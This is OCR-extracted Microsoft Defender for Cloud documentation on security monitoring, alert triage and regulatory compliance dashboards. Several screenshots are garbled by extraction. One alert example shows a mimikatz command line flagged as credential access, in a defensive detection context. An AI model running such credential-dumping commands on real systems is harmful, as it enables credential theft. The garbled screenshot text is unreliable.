Defender for Cloud Data Security. 


Onboard non-Azure resources 


Defender for Cloud can monitor the security posture of your non-Azure computers but 
you need to first onboard these resources. Read Onboard non-Azure computers for 
more information on how to onboard non-Azure resources. 


Ongoing security monitoring 


After initial configuration and application of Defender for Cloud recommendations, the 
next step is considering Defender for Cloud operational processes. 


The Defender for Cloud Overview provides a unified view of security across all your 
Azure resources and any non-Azure resources you've connected. This example shows an 


environment with many issues to resolve: 


fa] Microsoft Defender for Cloud | Overview x 
Showing 78 subscipbons 


Font Subscriptions G7 Whats new 
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© Note 


Defender for Cloud doesn't interfere with your normal operational procedures. 
Defender for Cloud passively monitors your deployments and provides 
recommendations based on the security policies you enabled. 


When you first opt in to use Defender for Cloud for your current Azure environment, 
make sure that you review all recommendations, which can be done in the 
Recommendations page. 


Plan to visit the threat intelligence option as part of your daily security operations. There 
you can identify security threats against the environment, such as identify if a particular 
computer is part of a botnet. 


Monitoring for new or changed resources 


Most Azure environments are dynamic, with resources regularly being created, spun up 
or down, reconfigured, and changed. Defender for Cloud helps ensure that you have 
visibility into the security state of these new resources. 


When you add new resources (VMs, SQL DBs) to your Azure environment, Defender for 
Cloud automatically discovers these resources and begins to monitor their security, 
including PaaS web roles and worker roles. If Data Collection is enabled in the Security 
Policy, more monitoring capabilities are enabled automatically for your virtual machines. 


You should also regularly monitor existing resources for configuration changes that 
could have created security risks, drift from recommended baselines, and security alerts. 


Hardening access and applications 


As part of your security operations, you should also adopt preventative measures to 
restrict access to VMs, and control the applications that are running on VMs. By locking 
down inbound traffic to your Azure VMs, you're reducing the exposure to attacks, and at 
the same time providing easy access to connect to VMs when needed. Use just-in-time 
VM access access feature to hardening access to your VMs. 


You can use adaptive application controls to limit which applications can run on your 
VMs located in Azure. Among other benefits, adaptive application controls help harden 
your VMs against malware. With the help of machine learning, Defender for Cloud 
analyzes processes running in the VM to help you create allowlist rules. 


Incident response 


Defender for Cloud detects and alerts you to threats as they occur. Organizations should 
monitor for new security alerts and take action as needed to investigate further or 
remediate the attack. For more information on how Defender for Cloud threat 
protection works, read How Defender for Cloud detects and responds to threats. 


Although we can't create your Incident Response plan, we'll use Microsoft Azure Security 
Response in the Cloud lifecycle as the foundation for incident response stages. The 
stages of incident response in the cloud lifecycle are: 


Detect Diagnose 


AD Assess 
Stabilize 


O Note 


You can use the National Institute of Standards and Technology (NIST) Computer 
Security Incident Handling Guide” as a reference to assist you building your own. 


You can use Defender for Cloud alerts during the following stages: 
e Detect: identify a suspicious activity in one or more resources. 


e Assess: perform the initial assessment to obtain more information about the 


suspicious activity. 


e Diagnose: use the remediation steps to conduct the technical procedure to 


address the issue. 


Each Security Alert provides information that can be used to better understand the 
nature of the attack and suggest possible mitigations. Some alerts also provide links to 
either more information or to other sources of information within Azure. You can use the 
information provided for further research and to begin mitigation, and you can also 


search security-related data that is stored in your workspace. 


The following example shows a suspicious RDP activity taking place: 


Suspicious RDP VM activity 


Several Remote Desktop login attempts were detected 


the attempts in the last 24 hours 


were On invalid accounts 


Tuesd. Anril 12 2016 
vescay. AL dud 6 


Medium 


FreeRDP 


1. If available, add the source IP to NS 


hours (see https://azure.microsofLco 


3. Create an allow list 
https-//azure.mic 


us/documentation/articles/virtual-networks-nsg 


This page shows the details regarding the time that the attack took place, the source 
hostname, the target VM and also gives recommendation steps. In some circumstances, 
the source information of the attack may be empty. Read Missing Source Information in 
Defender for Cloud alerts for more information about this type of behavior. 


Once you identify the compromised system, you can run a workflow automation that 
was previously created. Workflow automations are a collection of procedures that can 
be executed from Defender for Cloud once triggered by an alert. 


O Note 


Read Managing and responding to security alerts in Defender for Cloud for more 
information on how to use Defender for Cloud capabilities to assist you during your 
Incident Response process. 


Next steps 


In this document, you learned how to plan for Defender for Cloud adoption. Learn more 
about Defender for Cloud: 


e Managing and responding to security alerts in Defender for Cloud 

e Monitoring partner solutions with Defender for Cloud - Learn how to monitor the 
health status of your partner solutions. 

e Defender for Cloud common questions - Find frequently asked questions about 
using the service. 

e Azure Security blog - Read blog posts about Azure security and compliance. 


Protect your Virtual Machines (VMs) 
with Microsoft Defender for Servers 


Article e 06/29/2023 


Defender for Servers in Microsoft Defender for Cloud, limits your exposure to threats by 
using access and application controls to block malicious activity. Just-in-time (JIT) virtual 
machine (VM) access reduces your exposure to attacks by enabling you to deny 
persistent access to VMs. Instead, you provide controlled and audited access to VMs 
only when needed. Adaptive application controls help harden VMs against malware by 
controlling which applications can run on your VMs. Defender for Cloud uses machine 
learning to analyze the processes running in the VM and helps you apply allowlist rules 
using this intelligence. 


In this tutorial you'll learn how to: 


Y Configure a just-in-time VM access policy 
Y Configure an application control policy 


Prerequisites 


To step through the features covered in this tutorial, you must have Defender for 
Cloud's enhanced security features enabled. A free trial is available. To upgrade, see 
Enable enhanced protections. 


Manage VM access 


JIT VM access can be used to lock down inbound traffic to your Azure VMs, reducing 
exposure to attacks while providing easy access to connect to VMs when needed. 


Management ports don't need to be open always. They only need to be open while 
you're connected to the VM, for example to perform management or maintenance 
tasks. When just-in-time is enabled, Defender for Cloud uses Network Security Group 
(NSG) rules, which restrict access to management ports so they can't be targeted by 
attackers. 


Follow the guidance in Secure your management ports with just-in-time access. 


Harden VMs against malware 


Adaptive application controls help you define a set of applications that are allowed to 
run on configured resource groups, which among other benefits helps harden your VMs 
against malware. Defender for Cloud uses machine learning to analyze the processes 
running in the VM and helps you apply allowlist rules using this intelligence. 


Follow the guidance in Use adaptive application controls to reduce your machines’ 
attack surfaces. 


Next steps 
In this tutorial, you learned how to limit your exposure to threats by: 


Y Configuring a just-in-time VM access policy to provide controlled and audited 
access to VMs only when needed 

Y Configuring an adaptive application controls policy to control which applications 
can run on your VMs 


Advance to the next tutorial to learn about responding to security incidents. 


Tutorial: Respond to security incidents 


Tutorial: Triage, investigate, and respond 
to security alerts 


Article e 06/29/2023 


Microsoft Defender for Cloud continuously analyzes your hybrid cloud workloads using 
advanced analytics and threat intelligence to alert you about potentially malicious 
activities in your cloud resources. You can also integrate alerts from other security 
products and services into Defender for Cloud. Once an alert is raised, swift action is 
needed to investigate and remediate the potential security issue. 


In this tutorial, you will learn how to: 


vV Triage security alerts 
vV Investigate a security alert to determine the root cause 
vV Respond to a security alert and mitigate that root cause 


If you don't have an Azure subscription, create a free account” before you begin. 


Prerequisites 


e You'll need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription” . 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


Triage security alerts 


Defender for Cloud provides a unified view of all security alerts. Security alerts are 
ranked based on the severity of the detected activity. 


Triage your alerts from the Security alerts page: 


Security alerts x 


©) Refresh S ye e TE Open query ZG Suppression rules & Security alerts map (Preview) © Create sample alerts 
Active alerts by severity 


Active alerts Affected resources l High (166) I Medium (414) | Low (64) 


A earch by ID, title, or affected resource Status == Active X Severity == Low, Medium, High X Time == Last month X BEA Add filter 


| No grouping KA 

I Severity A Alert title Ty Affected resource Ty Activity start time (UTC+2) Ty MITRE ATT&CK® tactics Status Ty 

| High DU Suspicious process executed [seen... E CH-VictimvM00-Dev 11/22/20, 3:00 AM E, Credential Access Active 

| High E Suspicious process executed [seen ... EZ cH-Victimvmo0 11/22/20, 1:00 AM S Credential Access Active 
I | High OO Suspicious process executed [seen .. E dockervm-redhat 11/21/20, 3:00 AM E, Credential Access Active 
L_| | High O Suspicious process executed [seen ... EZ dockeroniaasdemo 11/21/20, 1:00 AM E, Credential Access Active 

| High O Suspicious process executed [seen... Se samplecrmweblobstor... 11/20/20, 7:00 AM S Credential Access Active 
C) | High DU Suspicious process executed EZ dockervm-redhat 11/20/20, 6:00 AM E, Credential Access Active 

| High Q Suspicious process executed EZ dockervm-redhat 11/20/20, 5:00 AM S Credential Access Active 
C] | High O Microsoft Defender for Cloud test ale... GO ASC-AKS-CLOUD-TALK 11/20/20, 3:00 AM a Persistence Active 
EK | High @ Exposed Kubernetes dashboard det... 48 ASC-WORKLOAD-PRO... 11/20/20, 12:00 AM EJ initial access Active 
L_ | High O Suspicious process executed (seen... E CH-VictimVM00-Dev 11/19/20, 7:00 PM S Credential Access Active 


err Page | 4 be | of 17 | Next > | 


Use this page to review the active security alerts in your environment to decide which 
alert to investigate first. 


When triaging security alerts, prioritize alerts based on the alert severity by addressing 
alerts with higher severity first. Learn more about alerts severity in How are alerts 
classified?. 

Ọ Tip 


You can connect Microsoft Defender for Cloud to most popular SIEM solutions 
including Microsoft Sentinel and consume the alerts from your tool of choice. Learn 
more in Stream alerts to a SIEM, SOAR, or IT Service Management solution. 


Investigate a security alert 
Once you have selected an alert, you will then be able to investigate it. 
To investigate a security alert: 

1. Select the desired alert. 


2. From the alert overview page, select the resource to investigate first. 


3. Begin your investigation from the left pane, which shows the high-level 
information about the security alert. 


Security alert 2 & x 
2518009343988179077_0 
Ọ Suspicious process executed Alert details Take action 
High €: Active ny © 09/29/20, 1... 
Severity Status Activity time Compromised Host Suspicious Command Line 
VICTIMOO c:\tools\mimikatz\x64\mimikatz.exe "privilege:debug" ... 


See more 


Alert description 


Machine logs indicate that the suspicious process: 'c:\tools\mimikatz User Name Parent Process 
\x64\mimikatz.exe' was running on the machine, often associated with NA\Victim00$ 


attacker attempts to access credentials.’ c\windows\system32\cmd.exe 


Account Session ID Suspicious Process D 


Affected resource 


mer Oxfa8 
CH-VictimVM00-Dev E 
E Virtual machine Creator: VIACode Demo_Applicati 
Suspicious Process Detected by 
Contoso Hotels - Dev il il 
c\tools\mimikatz\x64\mimikatz.exe BE 
? Subscription = e ma Microsoft 


Related entities 
MITRE ATT&CK® tactics © 


© Credential Access v EZ account (1) 


VB Fie 
v EA dost (1) 


w SK Host logon session (1) 
v d Process (2) ş 


This pane shows: 


Alert severity, status, and activity time 


Description that explains the precise activity that was detected 
Affected resources 
Kill chain intent of the activity on the MITRE ATT&CK matrix 


4. For more detailed information that can help you investigate the suspicious activity, 
examine the Alert details tab. 


5. When you've reviewed the information on this page, you may have enough to 
proceed with a response. If you need further details: 


e Contact the resource owner to verify whether the detected activity is a false 
positive. 
e Investigate the raw logs generated by the attacked resource 


Respond to a security alert 


After you've investigated a security alert and understood its scope, you can respond to 
the alert from within Microsoft Defender for Cloud: 


1. Open the Take action tab to see the recommended responses. 


Security alert 2 & 


251802561 


Ọ Suspicious authentication activity 


Medium 2S Active ea © 09/10/20, 1... 
Severity Status Activity time 
Alert description 


Although none of them succeeded, some of them used accounts were 
recognized by the host. 

This resembles a dictionary attack, in which an attacker performs 
numerous authentication attempts using a dictionary of predefined 
account names and passwords in order to find valid credentials to 
access the host. 

This indicates that some of your host account names might exist in a 
well-known account name dictionary. 


Affected resource 


EC2 
Azure Arc machine 


? Bir 
Subscription 


MITRE ATT&CK® tactics © 


Alert details 


^ @ Mitigate the threat 


1. Enforce the use of strong passwords and do not re-use them across multiple resources and services 

2. In case this is an Azure Virtual Machine, set up an NSG allow list of only expected IP addresses or ranges. (see 
https://azure.microsoft.com/en-us/documentation/articles/virtual-networks-nsg/) 

3. In case this is an Azure Virtual Machine, lock down access to it using network JIT (see https://docs.microsoft.com 


/en-us/azure/security-center/security-center-just-in-time) 
You have 26 more alerts on the affected resource. View all >> 
Prevent future attacks 

Your top 3 active security recommendations on a EC2: 


| Low 3 Vulnerabilities in security configuration on your machines should be remediated 


| Medium == A vulnerability assessment solution should be enabled on your virtual machines 


| High E Adaptive application controls for defining safe applications should be enabled on your machines 


Solving security recommendations can prevent future attacks by reducing attack surface. 


View all 4 recommendations >> 


© Pre-attack v {A} Trigger automated response 


EO wv @ Suppress similar alerts (preview) 


. Review the Mitigate the threat section for the manual investigation steps 
necessary to mitigate the issue. 


. To harden your resources and prevent future attacks of this kind, remediate the 
security recommendations in the Prevent future attacks section. 


. To trigger a logic app with automated response steps, use the Trigger automated 


response section. 


. If the detected activity isn’t malicious, you can suppress future alerts of this kind 
using the Suppress similar alerts section. 


. When you've completed the investigation into the alert and responded in the 
appropriate way, change the status to Dismissed. 


Ọ Suspicious authentication activity 


Medium 2S Active 


Severity eS = 


v © 09/10/20, 1... 


A etta time 


2S Active 
Alert description 
© Dismissed N 
Although none of th counts were 
recognized by the h 
This resembles a dit | cancel e| forms 
numerous authentici Å edefined 
account names and pasəwuiu m viuc ty nnu vanu eecuentials to 
access the host. 
This indicates that some of your host account names might exist in a 
well-known account name dictionary. 


This removes the alert from the main alerts list. You can use the filter from the 
alerts list page to view all alerts with Dismissed status. 


7. We encourage you to provide feedback about the alert to Microsoft: 
a. Marking the alert as Useful or Not useful. 


b. Select a reason and add a comment. 


A^ Was this useful? © Yes O No x 


Reason 


Additional feedback? 


Additional feedback? 


[| Microsoft may email me about my feedback. 


Q Tip 


We review your feedback to improve our algorithms and provide better 
security alerts. 


Clean up resources 


There's no need to clean up any resources for this tutorial. 


Next steps 


In this tutorial, you learned about Defender for Cloud features to be used when 
responding to a security alert. For related material see: 


e Respond to Microsoft Defender for Key Vault alerts 
e Security alerts - a reference guide 
e What is Microsoft Defender for Cloud? 


Tutorial: Improve your regulatory 
compliance 
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Microsoft Defender for Cloud helps streamline the process for meeting regulatory 
compliance requirements, using the regulatory compliance dashboard. Defender for 
Cloud continuously assesses your hybrid cloud environment to analyze the risk factors 
according to the controls and best practices in the standards that you've applied to your 
subscriptions. The dashboard reflects the status of your compliance with these 
standards. 


When you enable Defender for Cloud on an Azure subscription, the Microsoft cloud 
security benchmark is automatically assigned to that subscription. This widely respected 
benchmark builds on the controls from the Center for Internet Security (CIS) Z, PCI- 
DSS and the National Institute of Standards and Technology (NIST) & with a focus on 
cloud-centric security. 


The regulatory compliance dashboard shows the status of all the assessments within 
your environment for your chosen standards and regulations. As you act on the 
recommendations and reduce risk factors in your environment, your compliance posture 
improves. 


In this tutorial you'll learn how to: 


v Evaluate your regulatory compliance using the regulatory compliance dashboard 
Y Check Microsoft's compliance offerings (currently in preview) for Azure, Dynamics 
365 and Power Platform products 

Improve your compliance posture by taking action on recommendations 


KS 


Download PDF/CSV reports as well as certification reports of your compliance 
status 


vV Setup alerts on changes to your compliance status 
v Export your compliance data as a continuous stream and as weekly snapshots 


If you don’t have an Azure subscription, create a free account” before you begin. 


Prerequisites 
To step through the features covered in this tutorial: 


e Enable enhanced security features. You can enable these for free for 30 days. 


e You must be signed in with an account that has reader access to the policy 
compliance data. The Reader role for the subscription has access to the policy 
compliance data, but the Security Reader role doesn't. At a minimum, you'll need 
to have Resource Policy Contributor and Security Admin roles assigned. 


Assess your regulatory compliance 


The regulatory compliance dashboard shows your selected compliance standards with 
all their requirements, where supported requirements are mapped to applicable security 
assessments. The status of these assessments reflects your compliance with the 
standard. 


Use the regulatory compliance dashboard to help focus your attention on the gaps in 
compliance with your chosen standards and regulations. This focused view also enables 
you to continuously monitor your compliance over time within dynamic cloud and 
hybrid environments. 


1. Sign in to the Azure portal £. 
2. Navigate to Defender for Cloud > Regulatory compliance. 


The dashboard provides you with an overview of your compliance status and the 
set of supported compliance regulations. You'll see your overall compliance score, 
and the number of passing vs. failing assessments associated with each standard. 


Home > Micusoft Def 


soft Defender for Cloud 
O Microsoft Defender for Cloud | Regulatory compliance 


NIST SP 800 53 R4 


Operational 


v © AC-2(7), Role-based Schemes Control details 


The following list has a numbered item that matches each location in the image above, 
and describes what is in the image: 


e Select a compliance standard to see a list of all controls for that standard. (1) 
e View the subscription(s) that the compliance standard is applied on. (2) 


e Select a Control to see more details. Expand the control to view the assessments 
associated with the selected control. Select an assessment to view the list of 
resources associated and the actions to remediate compliance concerns. (3) 

e Select Control details to view Overview, Your Actions and Microsoft Actions tabs. 


(4) 

e In the Your Actions tab, you can see the automated and manual assessments 
associated to the control. (5) 

e Automated assessments show the number of failed resources and resource types, 
and link you directly to the remediation experience to address those 
recommendations. (6) 

e The manual assessments can be manually attested, and evidence can be linked to 


demonstrate compliance. (7) 


Investigate regulatory compliance issues 


You can use the information in the regulatory compliance dashboard to investigate any 
issues that may be affecting your compliance posture. 


To investigate your compliance issues: 
1. Sign in to the Azure portal £. 
2. Navigate to Defender for Cloud > Regulatory compliance. 
3. Select a regulatory compliance standard. 
4. Select a compliance control to expand it. 


5. Select Control details. 


Azure Security Benchmark V3 ISO 27001 PCI DSS 3.2.1 SOCTSP = HIPAA HITRUST NIST SP 800 53 R4 


Under each applicable compliance control is the set of assessments run by Defender for Cloud that are associated with that con 
regulation are covered by Defender for Cloud assessments, and therefore this report is only a partial view of your overall compli 


NIST SP 800 53 R4 is applied to the subscription AG_Compliance_Compliance_TEST 


O Expand all compliance controls 


^a D AC. Access Control 


v © AC-1. Access Control Policy and Procedures} Control details 


^A D AC-2. Account Management 


V © AC.2*. Additional assessments for AC-2 - Account Management 


vw © AC-2(1). Automated System Account Management Control details 


e Select Overview to see the specific information about the Control you 
selected. 

e Select Your Actions to see a detailed view of automated and manual actions 
you need to take to improve your compliance posture. 

e Select Microsoft Actions to see all the actions Microsoft took to ensure 
compliance with the selected standard. 


6. Under Your Actions, you can select a down arrow to view more details and resolve 
the recommendation for that resource. 


Dashboard Microsoft Defender for Cloud NIST SP 800 53 R4 


AC.2.7 Role-based Schemes 


Overview Your Actions Microsoft Actions 
Your Actions Action Name Action Type 
Automated Audit usage of custom RBAC rules Technical 
Automated Service Fabric clusters should only use Azure Active Directory for client Technical T 
authentication 
Automated SQL servers should have an Azure Active Directory administrator Technical 
provisioned 


For more information about how to apply recommendations, see Implementing 
security recommendations in Microsoft Defender for Cloud. 
© Note 


Assessments run approximately every 12 hours, so you will see the impact on 
your compliance data only after the next run of the relevant assessment. 


Remediate an automated assessment 


The regulatory compliance has both automated and manual assessments that may need 
to be remediated. Using the information in the regulatory compliance dashboard, 
improve your compliance posture by resolving recommendations directly within the 
dashboard. 


To remediate an automated assessment: 
1. Sign in to the Azure portal £. 


2. Navigate to Defender for Cloud > Regulatory compliance. 


3. Select a regulatory compliance standard. 
4. Select a compliance control to expand it. 


5. Select any of the failing assessments that appear in the dashboard to view the 
details for that recommendation. Each recommendation includes a set of 
remediation steps to resolve the issue. 


6. Select a particular resource to view more details and resolve the recommendation 
for that resource. 
For example, in the Azure CIS 1.1.0 standard, select the recommendation Disk 
encryption should be applied on virtual machines. 


Disk encryption should be applied on virtual machines x 


Severity Freshness interval 
| High ® 24 Hours 
v Description 


Y Remediation steps 


^ Affected resources 


Unhealthy resources (107) Healthy resources (0) Not applicable resources (18) 


| Ø Search virtual machines 


T Name y Subscription 
O M urtee ASC DEMO 
O BA urre ASC DEMO 
O M vvs ASC DEMO 


7. In this example, when you select Take action from the recommendation details 
page, you arrive in the Azure Virtual Machine pages of the Azure portal, where you 
can enable encryption from the Security tab: 


VM6 > Disk encryption should be applied on virtual machines > VM6 
@ Disk settings & 


VM6 


Ultra disk 


(i) Ultra disk is available only for Availability Zones in eastus2. Learn more (7 


Encryption settings 
Azure Disk Encryption (ADE) provides volume encryption for the OS and data disks. Learn more about Azure Disk 
Encryption. 


Disks to encrypt © 


None 
OS disk 


OS and data disks 


O 


For more information about how to apply recommendations, see Implementing 


security recommendations in Microsoft Defender for Cloud. 
8. After you take action to resolve recommendations, you'll see the result in the 
compliance dashboard report because your compliance score improves. 
© Note 


Assessments run approximately every 12 hours, so you will see the impact on 
your compliance data only after the next run of the relevant assessment. 


Remediate a manual assessment 


The regulatory compliance has automated and manual assessments that may need to be 
remediated. Manual assessments are assessments that require input from the customer 
to remediate them. 


To remediate a manual assessment: 
1. Sign in to the Azure portal £. 
2. Navigate to Defender for Cloud > Regulatory compliance. 


3. Select a regulatory compliance standard. 


4. Select a compliance control to expand it. 

5. Under the Manual attestation and evidence section, select an assessment. 
6. Select the relevant subscriptions. 

7. Select Attest. 

8. Enter the relevant information and attach evidence for compliance. 


9. Select Save. 


Generate compliance status reports and 
certificates 


e To generate a PDF report with a summary of your current compliance status for a 
particular standard, select Download report. 


The report provides a high-level summary of your compliance status for the 
selected standard based on Defender for Cloud assessments data. The report's 
organized according to the controls of that particular standard. The report can be 
shared with relevant stakeholders, and might provide evidence to internal and 
external auditors. 


Dashboard > Microsoft Defender for Cloud Download report x 
Q Microsoft Defender for Cloud | Regulatory c 


Showing 2 subscriptions 


5 Export regulatory standard compliance 
» Download report | © Manage compliance policies status report as PDF or CSV formats. 


Azure Security Benchmark Lowest compliance regulator 


Report standard 


7/37 SOC TSP - 
19% (7 of 37 passed controls) Pei Azure Security Benchmark 
EZEZ 


PCI 


DSS 3.2.1 


NIST SP 800 53 R4 


Azure Security Benchmark V3 ISO 27001 PCI DSS 3.2.1 SOC TSP 


e To download Azure and Dynamics certification reports for the standards applied 
to your subscriptions, use the Audit reports option. 


Q Microsoft Defender for Cloud | Regulatory compliance 


Showing 2 subscriptions 


d Download report G: Manage compliance policies b Open query Audit reports E Compliance over time workbook 


Select the tab for the relevant reports types (PCI, SOC, ISO, and others) and use 
filters to find the specific reports you need: 


Audit reports 


Showing 1 to 10 of 12 results 


[e Search report Region : All | 7 selected AS Industry : All 


Title Ty Downloa n Standard 
- @ Select all z 
Microsoft Azure Dynamics X% Downl it report for demonstrating Microsoft Azure, Dynamics 365 15027001 
Ser 2 2 Regulatory standard 27701 (PIMS) frameworks. 15027018 
Ass nt Report 12.2.2020 1$027701 
E 's020000-1 
Microsoft Azure Dynamics 365 and Online X Downl demonstrating Microsoft Azure, Dynamics 365, and Other 15027001 
Ser S027001 and 27701 Certificate e 15022301 n Management Systems) framework. 1S027701 
12.18.2020 
° 18027001 


soft Azure Dynamics 365 and Online SZ Downl el 15027017 demonstrating Microsoft Azure, Dynamics 365, and Other 15027017 


Services - ISO 27017 Certificate 12.18.2020 
E ssoz7018 


Microsoft Azure Dynamics 365 and Online Se Downl ei 1SO27701 demonstrating Microsoft Azure, Dynamics 365, and Other 15027018 
es - ISO 27018 Certifica 18 
E sos 


~ Download Certificate demonstrating Microsoft Azure, Dynamics 365, and Other 
nformation Management Systems) framework. 


Microsoft Azure + Dynamics 365 and 
Other Online Services - 1SO27001 


27701 Certificate - 8.13.2020 


For example, from the PCI tab you can download a ZIP file containing a digitally 
signed certificate demonstrating Microsoft Azure, Dynamics 365, and Other Online 
Services' compliance with ISO22301 framework, together with the necessary 
collateral to interpret and present the certificate. 


O Note 


When you download one of these certification reports, you'll be shown the 
following privacy notice: 


By downloading this file, you are giving consent to Microsoft to store the current 
user and the selected subscriptions at the time of download. This data is used in 
order to notify you in case of changes or updates to the downloaded audit 
report. This data is used by Microsoft and the audit firms that produce the 
certification/reports only when notification is required. 


Check compliance offerings status 


Transparency provided by the compliance offerings (currently in preview) , allows you to 
view the certification status for each of the services provided by Microsoft prior to 
adding your product to the Azure platform. 


To check the compliance offerings status: 
1. Sign in to the Azure portal £. 
2. Navigate to Defender for Cloud > Regulatory compliance. 


3. Select Compliance offerings. 


Home > Microsoft Defender for Cloud 


O Microsoft Defender for Cloud | Regulatory compliance A 
[e Search d Download report @: Manage compliance policies TZ Openquery EI Compliance over time workbook [Ê] Audit reports 


4. Enter a service in the search bar to view its compliance offering. 


Home > Microsoft Defender for Cloud | Regulatory compliance 


Compliance Offerings x 


Compliance Offerings include various types of assurances, including formal certifications and attestations produced by independent third-party audit firms as well as self-assessments produced by Microsoft. 


Product: (Al) Services: (AI) Industry: (All) Compliance Offering : (All) J Download 
dd dda S d d a 
e dde d dd d dd d E B 
EO è dida dA Ld GO oe Pe A Mees EEA © 
Al build 00000000 0000000000090 T 
API Management 0000000000000000 AK A A DB EG | 
9999990090 AK A ZL E AK 898998289 AK EG 
999990900090 A RL AE AK A A A a A A AK @ 
9999909009090 89898 99999 A A A AK OG 
A A B 9090000020090 O89 A AK A A AK 
999° 9090900 9 000000000000 
0000000000000000 E AK BG @ 
La A A A AK A A AAK A AKA A AK AR A A AK AH A 
0000000000000000 0000 
00000 o 000000000000 
0o 0 0 o 00000 0000000 Q 
o o 00000 iv} 0000 
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Configure frequent exports of your compliance 
status data 


If you want to track your compliance status with other monitoring tools in your 
environment, Defender for Cloud includes an export mechanism to make this 
straightforward. Configure continuous export to send select data to an Azure Event 
Hubs or a Log Analytics workspace. Learn more in continuously export Defender for 
Cloud data. 


Use continuous export data to an Azure Event Hubs or a Log Analytics workspace: 


e Export all regulatory compliance data in a continuous stream: 


Settings | Continuous export 


Contoso Infra 


E Search (Ctrl+/) | Save 


Settings Eventhub Log Analytics workspace 


ss) Microsoft Defender for Cloud 


plans 


Export enabled On Off 
SZ Auto provisioning 
Exported data types 
@ Email notifications P typ 
© Integrations O Security recommendations No selected recommendation v 


%$ Workflow automation 


. [_] secure score © No selected secure score v 
Continuous export 


Security alerts iti 
Policy settings L ty No selected severities Vv | 


@ Security policy D Regulatory compliance 


Azure-Security-Benchmark,PCI-DS... “A | 
B 
[mi] select all 


ES Azure-Security-Benchmark 


Export frequency 


D Streaming updates © 


[_] Snapshots (Preview) © 


[_] 1so-27001 


E rci-pss-3.2.1 
[_] soc-tsp 
TI uko-and-Uk-NHS a 


e Export weekly snapshots of your regulatory compliance data: 


Settings | Continuous export 


Contoso Infra 


E Search (Ctri+/) | Save 


Settings Event hub Log Analytics workspace 


=) Microsoft Defender for Cloud urr rr rr 
plans Export enabled one] Off ) 
» Auto provisioning 
Exported data types 


@ Email notifications 


© integrations LJ Security recommendations No selected recommendation Vv 
ZA Workflow automation B 

[_J Secure score (Preview) © No selected secure score Vv 
E Continuous export 

[_] Security alerts No selected severities ba 


Policy settings 


E Security policy 


Export freauencv 


Export weekly snapshot of the data types selected under ‘Exported data types’. 
These supported data types are: overall Secure score, secure score controls, regulatory 


compliance. 
@ Snapshots (Preview) dk Q 


Ọ Tip 


You can also manually export reports about a single point in time directly from the 
regulatory compliance dashboard. Generate these PDF/CSV reports or Azure and 
Dynamics certification reports using the Download report or Audit reports 
toolbar options. See Assess your regulatory compliance 


Run workflow automations when there are 
changes to your compliance 


Defender for Cloud's workflow automation feature can trigger Logic Apps whenever one 
of your regulatory compliance assessments changes state. 


For example, you might want Defender for Cloud to email a specific user when a 
compliance assessment fails. You'll need to first create the logic app (using Azure Logic 
Apps) and then set up the trigger in a new workflow automation as explained in 
Automate responses to Defender for Cloud triggers. 


Dashboard > Microsoft Defender for Cloud > Settings Add workflow automation x 
ZG Settings | Workflow automation ee 
Showing 63 subscriptions 
Name * 
P Search (Ctrl+/) « C) Refresh 
Settings R 
- Description 
= | Filter by name JG Se... En... 
El Microsoft Defender for Cloud 
plans 
% Auto provisioning Name Ty Status Ty Scope 
a Subscription © 
Email notifications XG test © Enabled ASC DEMO Zee E 
© integrations ZA testSecureScorecont-- () Enabled ASC DEMO Dame i 
ZA Workflow automation Ee 


Continuous export 


Trigger conditions © 
Choose the trigger conditions that will automatically trigger the configured action. 


Defender for Cloud data type * 


Regulatory compliance standards 


Compliance standard * 


Azure-Security-Benchmark 


Compliance control state * 


Passed, Failed 


(m) Select all 


E riea 
@ TT 


Skipped 


Unsupported 


Next steps 


In this tutorial, you learned about using Defender for Cloud's regulatory compliance 
dashboard to: 


v View and monitor your compliance posture regarding the standards and 
regulations that are important to you. 

VY Improve your compliance status by resolving relevant recommendations and 
watching the compliance score improve. 


The regulatory compliance dashboard can greatly simplify the compliance process, and 
significantly cut the time required for gathering compliance evidence for your Azure, 
hybrid, and multicloud environment. 


To learn more, see these related pages: 


e Customize the set of standards in your regulatory compliance dashboard - Learn 
how to select which standards appear in your regulatory compliance dashboard. 

e Managing security recommendations in Defender for Cloud - Learn how to use 
recommendations in Defender for Cloud to help protect your Azure resources. 

e Check out common questions about regulatory compliance. 


Customize the set of standards in your 
regulatory compliance dashboard 


Article e 10/10/2023 


Microsoft Defender for Cloud continually compares the configuration of your resources 
with requirements in industry standards, regulations, and benchmarks. The regulatory 
compliance dashboard provides insights into your compliance posture based on how 


you're meeting specific compliance requirements. 


@ Tip 


Learn more about Defender for Cloud's regulatory compliance dashboard in the 


common questions. 


How are compliance standards represented in 
Defender for Cloud? 


Industry standards, regulatory standards, and benchmarks are represented in Defender 
for Cloud's regulatory compliance dashboard. Each standard is an initiative defined in 
Azure Policy. 


To see compliance data mapped as assessments in your dashboard, add a compliance 
standard to your management group or subscription from within the Security policy 
page. To learn more about Azure Policy and initiatives, see Working with security 


policies. 


When you've assigned a standard or benchmark to your selected scope, the standard 
appears in your regulatory compliance dashboard with all associated compliance data 
mapped as assessments. You can also download summary reports for any of the 
standards that have been assigned. 


Microsoft tracks the regulatory standards themselves and automatically improves its 
coverage in some of the packages over time. When Microsoft releases new content for 
the initiative, it appears automatically in your dashboard as new policies mapped to 
controls in the standard. 


What regulatory compliance standards are 
available in Defender for Cloud? 


By default: 


e Azure subscriptions get the Microsoft cloud security benchmark assigned. This is 
the Microsoft-authored, cloud specific guidelines for security and compliance best 
practices based on common compliance frameworks. Learn more about Microsoft 
cloud security benchmark. 

e AWS accounts get the AWS Foundational Security Best Practices standard 
assigned. This is the AWS-specific guideline for security and compliance best 
practices based on common compliance frameworks. 


e GCP projects get the GCP Default standard assigned. 


If a subscription, account, or project has any Defender plan enabled, more standards can 
be applied. 


Available regulatory standards: 


Standards for Azure subscriptions Standards for AWS Standards for GCP 


PCI-DSS v3.2.1 (deprecated) 
PCI DSS v4 

SOC TSP 

SOC 2 Type 2 

ISO 27001:2013 

CIS Azure Foundations v1.1.0 
CIS Azure Foundations v1.3.0 
CIS Azure Foundations v1.4.0 
CIS Azure Foundations v2.0.0 
NIST SP 800-53 R4 

NIST SP 800-53 R5 

NIST SP 800 171 R2 

CMMC Level 3 


FedRAMP H 


accounts 


CIS AWS Foundations v1.2.0 


CIS AWS Foundations v1.5.0 


PCI DSS v3.2.1 


projects 

CIS GCP Foundations v1.1.0 
CIS GCP Foundations v1.2.0 
PCI DSS v3.2.1 

NIST 800-53 


ISO 27001 


